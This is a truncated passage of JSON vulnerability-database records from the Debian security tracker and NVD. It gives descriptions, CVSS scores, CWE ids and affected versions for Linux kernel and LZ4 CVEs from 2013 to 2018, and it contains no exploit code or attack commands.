"2015-11-16T11:59:00", "id": "DEBIANCVE:CVE-2015-8104", "href": "https://security-tracker.debian.org/tracker/CVE-2015-8104", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-07T14:56:58", "description": "The cdrom_ioctl_media_changed function in drivers/cdrom/cdrom.c in the Linux kernel before 4.16.6 allows local attackers to use a incorrect bounds check in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read out kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-05-09T17:29:00", "type": "debiancve", "title": "CVE-2018-10940", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10940"], "modified": "2018-05-09T17:29:00", "id": "DEBIANCVE:CVE-2018-10940", "href": "https://security-tracker.debian.org/tracker/CVE-2018-10940", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-07T14:56:56", "description": "Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-08-19T18:29:00", "type": "debiancve", "title": "CVE-2017-10661", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10661"], "modified": "2017-08-19T18:29:00", "id": "DEBIANCVE:CVE-2017-10661", "href": "https://security-tracker.debian.org/tracker/CVE-2017-10661", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T18:14:30", "description": "The usb_destroy_configuration function in drivers/usb/core/config.c in the USB core subsystem in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources, which allows local users to cause a denial of service (out-of-bounds write access) or possibly have unspecified other impact via a crafted USB device.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T15:29:00", "type": "debiancve", "title": "CVE-2017-17558", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17558"], "modified": "2017-12-12T15:29:00", "id": "DEBIANCVE:CVE-2017-17558", "href": "https://security-tracker.debian.org/tracker/CVE-2017-17558", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T14:41:16", "description": "fs/pipe.c in the Linux kernel before 4.5 does not limit the amount of unread data in pipes, which allows local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.2, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-27T17:59:00", "type": "debiancve", "title": "CVE-2016-2847", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2847"], "modified": "2016-04-27T17:59:00", "id": "DEBIANCVE:CVE-2016-2847", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2847", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-03T14:41:17", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel 4.4.22 through 4.4.28 contains extended asm statements that are incompatible with the exception table, which allows local users to obtain root access on non-SMEP platforms via a crafted application. NOTE: this vulnerability exists because of incorrect backporting of the CVE-2016-9178 patch to older kernels.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "type": "debiancve", "title": "CVE-2016-9644", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178", "CVE-2016-9644"], "modified": "2016-11-28T03:59:00", "id": "DEBIANCVE:CVE-2016-9644", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-07T14:37:51", "description": "The offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T16:29:00", "type": "cve", "title": "CVE-2017-1000370", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2023-01-17T21:03:00", "cpe": [], "id": "CVE-2017-1000370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000370", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-07T10:22:01", "description": "Yann Collet LZ4 before r119, when used on certain 32-bit platforms that allocate memory beyond 0x80000000, does not properly detect integer overflows, which allows context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run, a different vulnerability than CVE-2014-4611.", "cvss3": {}, "published": "2014-07-03T04:22:00", "type": "cve", "title": "CVE-2014-4715", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4611", "CVE-2014-4715"], "modified": "2014-07-17T05:07:00", "cpe": ["cpe:/a:yann_collet:lz4:r118"], "id": "CVE-2014-4715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4715", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:yann_collet:lz4:r118:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T10:21:42", "description": "Integer overflow in the LZ4 algorithm implementation, as used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit platforms might allow context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run that would be improperly handled by programs not complying with an API limitation, a different vulnerability than CVE-2014-4715.", "cvss3": {}, "published": "2014-07-03T04:22:00", "type": "cve", "title": "CVE-2014-4611", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4611", "CVE-2014-4715"], "modified": "2021-09-28T08:15:00", "cpe": [], "id": "CVE-2014-4611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4611", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:38:05", "description": "The offset2lib patch as used by the Linux Kernel contains a vulnerability, if RLIMIT_STACK is set to RLIM_INFINITY and 1 Gigabyte of memory is allocated (the maximum under the 1/4 restriction) then the stack will be grown down to 0x80000000, and as the PIE binary is mapped above 0x80000000 the minimum distance between the end of the PIE binary's read-write segment and the start of the stack becomes small enough that the stack guard page can be jumped over by an attacker. This affects Linux Kernel version 4.11.5. This is a different issue than CVE-2017-1000370 and CVE-2017-1000365. This issue appears to be limited to i386 based systems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T16:29:00", "type": "cve", "title": "CVE-2017-1000371", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2023-01-17T21:03:00", "cpe": [], "id": "CVE-2017-1000371", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000371", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-07T14:36:00", "description": "arch/arm64/mm/dma-mapping.c in the Linux kernel before 4.0.3, as used in the ION subsystem in Android and other products, does not initialize certain data structures, which allows local users to obtain sensitive information from kernel memory by triggering a dma_mmap call.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-10T10:59:00", "type": "cve", "title": "CVE-2015-8950", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8950"], "modified": "2016-11-28T19:50:00", "cpe": ["cpe:/o:linux:linux_kernel:4.0.2"], "id": "CVE-2015-8950", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8950", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:46:08", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel before 4.7.5 does not initialize a certain integer variable, which allows local users to obtain sensitive information from kernel stack memory by triggering failure of a get_user_ex call.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-28T03:59:00", "type": "cve", "title": "CVE-2016-9178", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178"], "modified": "2016-11-28T22:06:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7.4"], "id": "CVE-2016-9178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9178", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T10:38:38", "description": "Race condition in the ip4_datagram_release_cb function in net/ipv4/datagram.c in the Linux kernel before 3.15.2 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging incorrect expectations about locking during multithreaded access to internal data structures for IPv4 UDP sockets.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-02-07T07:59:00", "type": "cve", "title": "CVE-2014-9914", "cwe": ["CWE-416", "CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9914"], "modified": "2023-01-17T21:40:00", "cpe": ["cpe:/o:google:android:7.1.1"], "id": "CVE-2014-9914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9914", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:7.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:35:59", "description": "The Direct Rendering Manager (DRM) subsystem in the Linux kernel through 4.x mishandles requests for Graphics Execution Manager (GEM) objects, which allows context-dependent attackers to cause a denial of service (memory consumption) via an application that processes graphics data, as demonstrated by JavaScript code that creates many CANVAS elements for rendering by Chrome or Firefox.", "cvss3": {}, "published": "2015-10-16T01:59:00", "type": "cve", "title": "CVE-2013-7445", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7445"], "modified": "2015-10-16T16:22:00", "cpe": ["cpe:/o:linux:linux_kernel:4.2.3", "cpe:/o:linux:linux_kernel:4.0.7", "cpe:/o:linux:linux_kernel:4.1.5", "cpe:/o:linux:linux_kernel:4.0.4", "cpe:/o:linux:linux_kernel:4.0.1", "cpe:/o:linux:linux_kernel:4.0.6", "cpe:/o:linux:linux_kernel:4.1.2", "cpe:/o:linux:linux_kernel:4.0.5", "cpe:/o:linux:linux_kernel:4.2.1", "cpe:/o:linux:linux_kernel:4.1.3", "cpe:/o:linux:linux_kernel:4.1.10", "cpe:/o:linux:linux_kernel:4.1.1", "cpe:/o:linux:linux_kernel:4.0.3", "cpe:/o:linux:linux_kernel:4.1.6", "cpe:/o:linux:linux_kernel:4.1.9", "cpe:/o:linux:linux_kernel:4.0.0", "cpe:/o:linux:linux_kernel:4.1.8", "cpe:/o:linux:linux_kernel:4.0.8", "cpe:/o:linux:linux_kernel:4.0.9", "cpe:/o:linux:linux_kernel:4.2.2", "cpe:/o:linux:linux_kernel:4.1.7", "cpe:/o:linux:linux_kernel:4.0.2", "cpe:/o:linux:linux_kernel:4.1.4"], "id": "CVE-2013-7445", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7445", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:39:44", "description": "arch/arm64/kvm/guest.c in KVM in the Linux kernel before 4.18.12 on the arm64 platform mishandles the KVM_SET_ON_REG ioctl. This is exploitable by attackers who can create virtual machines. An attacker can arbitrarily redirect the hypervisor flow of control (with full register control). An attacker can also cause a denial of service (hypervisor panic) via an illegal exception return. This occurs because of insufficient restrictions on userspace access to the core register file, and because PSTATE.M validation does not prevent unintended execution modes.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-10-07T06:29:00", "type": "cve", "title": "CVE-2018-18021", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18021"], "modified": "2019-04-03T01:29:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-18021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18021", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-06-05T14:58:50", "description": "The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-04T01:29:00", "type": "cve", "title": "CVE-2017-14991", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14991"], "modified": "2018-08-24T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.3"], "id": "CVE-2017-14991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14991", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:31:47", "description": "The do_check function in kernel/bpf/verifier.c in the Linux kernel before 4.11.1 does not make the allow_ptr_leaks value available for restricting the output of the print_bpf_insn function, which allows local users to obtain sensitive address information via crafted bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-22T22:29:00", "type": "cve", "title": "CVE-2017-9150", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": 